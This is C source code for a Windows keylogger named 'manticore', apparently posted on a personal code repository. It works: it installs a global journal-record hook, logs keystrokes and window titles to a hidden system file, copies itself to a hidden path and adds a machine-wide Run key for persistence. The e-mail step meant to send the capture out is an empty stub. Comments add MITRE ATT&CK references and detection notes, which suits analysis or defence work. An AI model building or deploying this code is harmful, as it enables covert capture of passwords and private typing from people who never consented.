Creative Commons License Foxbond's Repo

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
//Global state shared by the hook procedure, the capture thread and the start/stop helpers below.
//No locking around these variables is visible in this file.
BOOL logging=FALSE;//TRUE while the message loop in manticoreThread should keep running; cleared by manticoreStop
HANDLE fCap=0;//handle of the capture file that manticoreProc appends to
DWORD dwCap=0;//thread ID filled in by CreateThread in manticoreLog
HANDLE hCap=0;//handle of the capture thread
HHOOK lHook=0;//handle of the WH_JOURNALRECORD hook
HWND prevF=0;//window that was active at the previously logged key-down
HMODULE hMod=0;//module handle handed to SetWindowsHookEx; assigned in WinMain
//Hook procedure registered for WH_JOURNALRECORD by manticoreThread (keystroke capture, MITRE ATT&CK T1056.001).
//For every WM_KEYDOWN event it appends to the capture file fCap:
//  - the title of the active window, on its own line, whenever that window differs from the previous one;
//  - the key itself, either as the translated character(s) or as "[KeyName]" for non-character keys.
//Forensic note: a recovered capture file therefore interleaves window titles with the text typed into them.
//Parameters follow the Win32 hook-procedure convention: c is the hook code, l points to an EVENTMSG.
//Every path ends by forwarding the event with CallNextHookEx. WriteFile results are not checked anywhere.
LRESULT __stdcall manticoreProc(int c,WPARAM w,LPARAM l)//the journal log process
{
	if(c<0) //negative hook code: forward without looking at the event
	{
		return CallNextHookEx(lHook,c,w,l);
	}    
	if(c==HC_ACTION)//there is a message sent to a window
	{
		EVENTMSG *eptr=(EVENTMSG *)l;
		if(eptr->message==WM_KEYDOWN)//only key-down events are recorded; key-up and mouse events are ignored
		{
			DWORD dc,db;//dc: length of the key name; db: bytes-written out-parameter for WriteFile (never read)
			char myBuff[256];//receives the key name from GetKeyNameText
			int virtue,ns;
			virtue=LOBYTE(eptr->paramL);//low byte of paramL, used below as the virtual-key code
			ns=HIBYTE(eptr->paramL);//high byte of paramL, used below as the scan code
			ns<<=16;//moved to bits 16-23, where GetKeyNameText expects the scan code in its lParam argument
			HWND hf=GetActiveWindow();//did focus change?
			if(prevF!=hf)
			{
				char st[256];
				int nco;
				nco=GetWindowText(hf,st,256);//get the windows text
				if(nco>0)
				{
					char myBuff[512];//shadows the outer myBuff; holds the title wrapped in CRLF
					wsprintf(myBuff,"\r\n%s\r\n",st);
					WriteFile(fCap,myBuff,lstrlen(myBuff),&db,0);
				}
				prevF=hf;//last focus = prev focus
			}
			dc=GetKeyNameText(ns,myBuff,256);//gets the string representing keys name	
			if(dc)
			{
				if(virtue==VK_SPACE)//the space key is stored as a literal space, forced onto the single-character path
				{
					myBuff[0]=' ';
					myBuff[1]='\0';
					dc=1;
				}
				if(dc==1)//one-character key name: translate with the current keyboard state instead of writing the name
				{
					BYTE kb[256];
					WORD myword;
					int numwords;
					GetKeyboardState(kb);
					numwords=ToAscii(virtue,ns,kb,&myword,0);//translate virtual key codez
					if(numwords>0)//if one or two chars were copied to buffer
					{
						WriteFile(fCap,&myword,numwords,&db,0);
					}    				
				}
				else//longer key name: written as [KeyName]
				{
					WriteFile(fCap,"[",1,&db,0);
					WriteFile(fCap,myBuff,dc,&db,0);
					WriteFile(fCap,"]",1,&db,0);
					if(virtue==VK_RETURN)//Enter also ends the line in the capture file
					{
						WriteFile(fCap,"\r\n",2,&db,0);
					}    
				}
			}			
		}
	}
	return CallNextHookEx(lHook,c,w,l);
}
//Thread entry point of the capture thread, started by manticoreLog.
//lpv is used as a char* path of the capture file. The function opens or creates that file with the
//hidden and system attributes, seeks to its end, installs manticoreProc as a WH_JOURNALRECORD hook and
//then pumps this thread's message queue until the global `logging` flag is cleared.
//Returns EXIT_FAILURE when a hook cannot be installed, EXIT_SUCCESS after a normal stop.
//Detection notes: the observable behaviours are the SetWindowsHookEx call with WH_JOURNALRECORD and the
//creation of a file carrying FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM (MITRE ATT&CK T1564.001), which a
//default directory listing does not show. Microsoft documents the journaling hooks as unsupported
//starting with Windows 11.
DWORD __stdcall manticoreThread(LPVOID lpv)
{
	//handle caps lock
	MSG mymsg;
	BYTE dimkeys[256];//all-zero key-state table, passed to SetKeyboardState after a journal cancel
	int i;
	for(i=0;i<256;++i) 
	{
		dimkeys[i]=0;
	}    
	prevF=0;//forget the previous active window so the first key-down logs a window title
	//OPEN_ALWAYS: reuse an existing capture file or create a new one; other processes may read it (FILE_SHARE_READ)
	fCap=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
	if(fCap==INVALID_HANDLE_VALUE)//CreateFile reported failure
	{
		EXIT_FAILURE;
	}
	SetFilePointer(fCap,0,0,FILE_END);//append to whatever the file already holds
	lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);//global hook;record and watch input events
	if(lHook==0)
	{
		CloseHandle(fCap);
		fCap=0;
		return EXIT_FAILURE;
	}
	logging=TRUE;
	while(logging)//runs until manticoreStop clears the flag
	{
		while(PeekMessage(&mymsg,0,0,0,PM_NOREMOVE))//dont remove after processing
		{
			GetMessage(&mymsg,0,0,0);//get message from calling threads queue of msgs
			if(mymsg.message==WM_CANCELJOURNAL)//user cancels app journaling
			{
				//The hook is installed again after a cancel, so cancelling journaling does not end the capture;
				//it only ends when `logging` is cleared or the process exits.
				SetKeyboardState(dimkeys);//copy 256 byte array
				lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
				if(lHook==0)
				{
					CloseHandle(fCap);
					fCap=0;
					return EXIT_FAILURE;
				}
			}
			else
			{
				DispatchMessage(&mymsg);
			}
		}
		Sleep(1);//yield between polls of the message queue
	}
	//normal stop: remove the hook and release the capture file
	UnhookWindowsHookEx(lHook);
	CloseHandle(fCap);
	fCap=0;
	hCap=0;
	return EXIT_SUCCESS;
}
//Starts a capture session that writes to `file`.
//Creates the capture thread (manticoreThread) with the path pointer as its argument; the string is not
//copied here. Returns EXIT_FAILURE when a session is already running, when the thread cannot be created,
//or when the thread terminates within 5000 ms of being started (treated as a failed start).
//Otherwise the thread's priority is lowered to THREAD_PRIORITY_LOWEST and EXIT_SUCCESS is returned.
int manticoreLog(const char *file)
{
	//start the logging	
	if(logging==TRUE)
	{
		return EXIT_FAILURE;
	}
	hCap=CreateThread(0,0,manticoreThread,(LPVOID)file,0,&dwCap);
	if(hCap==0)
	{
		return EXIT_FAILURE;
	}
	//a thread handle becomes signalled when the thread ends, so WAIT_OBJECT_0 here means the thread already exited
	if(WaitForSingleObject(hCap,5000)==WAIT_OBJECT_0)
	{
		return EXIT_FAILURE;
	}
	SetThreadPriority(hCap,THREAD_PRIORITY_LOWEST);
	return EXIT_SUCCESS;
}
//Ends the running capture session.
//Clears the global `logging` flag, which the loop in manticoreThread polls, then waits up to 5000 ms for
//the capture thread to terminate. Returns false when no session was running or the thread did not end
//within the timeout, true otherwise.
bool manticoreStop()
{
	//stop the logging
	if(logging==FALSE)
	{
		return false;
	}
	logging=FALSE;
	if(WaitForSingleObject(hCap,5000)!=WAIT_OBJECT_0)
	{
		return false;
	}
	return true;
}
//Placeholder for the mail step. The parameter names and the original comment describe sending an
//e-mail with an attachment, but the body on this page contains no network code: no argument is read
//and the function always returns true.
bool manticoreFetch(const char *server,const char *to,const char *toname,const char *from,const char *subject,const char *body,const char *attachment)
{
	//send the e-mail, should be self explanatory

	return true;
}
//Program entry point. Runs only when __argc is exactly 12; the arguments are used as follows:
//  __argv[1]      path the running executable is copied to
//  __argv[2]      name of the value written under the HKLM Run key
//  __argv[3]      data of that value
//  __argv[4]      path of the capture file
//  __argv[5]      length of one capture interval, passed through atoi to Sleep (milliseconds)
//  __argv[6..11]  passed to manticoreFetch as server, to, toname, from, subject, body
//Behaviours a defender can look for (all visible below):
//  - the process copies its own image to another path and marks the copy hidden+system (MITRE ATT&CK T1564.001);
//  - a value is written to HKLM\Software\Microsoft\Windows\CurrentVersion\Run (T1547.001); the key is opened
//    with KEY_ALL_ACCESS, so the program exits early when it lacks that access;
//  - the capture file is created, filled and deleted again in a repeating cycle.
int __stdcall WinMain(HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)
{
	if(__argc!=12)
	{
		return EXIT_FAILURE;
	}
	char filename[MAX_PATH];
	GetModuleFileName(0,filename,MAX_PATH);//get name of the running app
	SetFileAttributes(__argv[1],FILE_ATTRIBUTE_NORMAL);//clear attributes on an existing copy so it can be overwritten
	CopyFile(filename,__argv[1],false);//false: an existing file at the destination is replaced
	//SetFileAttributes returns zero on failure and ERROR_SUCCESS is 0, so this exits when the attribute change failed
	if(SetFileAttributes(__argv[1],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM)==ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	HKEY hklm;
	//machine-wide autostart location; values here are launched at logon for every user
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&hklm)!=ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	if(RegSetValueEx(hklm,__argv[2],0,REG_SZ,(LPBYTE)__argv[3],strlen(__argv[3]))!=ERROR_SUCCESS)
	{
		return EXIT_FAILURE;
	}
	RegCloseKey(hklm);
	hMod=GetModuleHandle(0);//imperative,without this keylogging wolnt work.
	while(true)//capture cycle; no exit condition is visible, so it repeats until the process ends
	{
		manticoreLog(__argv[4]);//return value ignored
		Sleep(atoi(__argv[5]));
		manticoreStop();//return value ignored
		DWORD ThreadID;//despite the name, receives the connection flags from InternetGetConnectedState
		if(InternetGetConnectedState(&ThreadID,0)==true)//are we connected to internet?
		{
			manticoreFetch(__argv[6],__argv[7],__argv[8],__argv[9],__argv[10],__argv[11],__argv[4]);//e-mail the file
			//the capture file is removed after every interval in which a connection is reported, so the
			//on-disk copy is short-lived; with manticoreFetch as shown on this page nothing has been sent first
			DeleteFile(__argv[4]);
		}
	}
	return EXIT_SUCCESS;//not reached: the loop above has no break
}
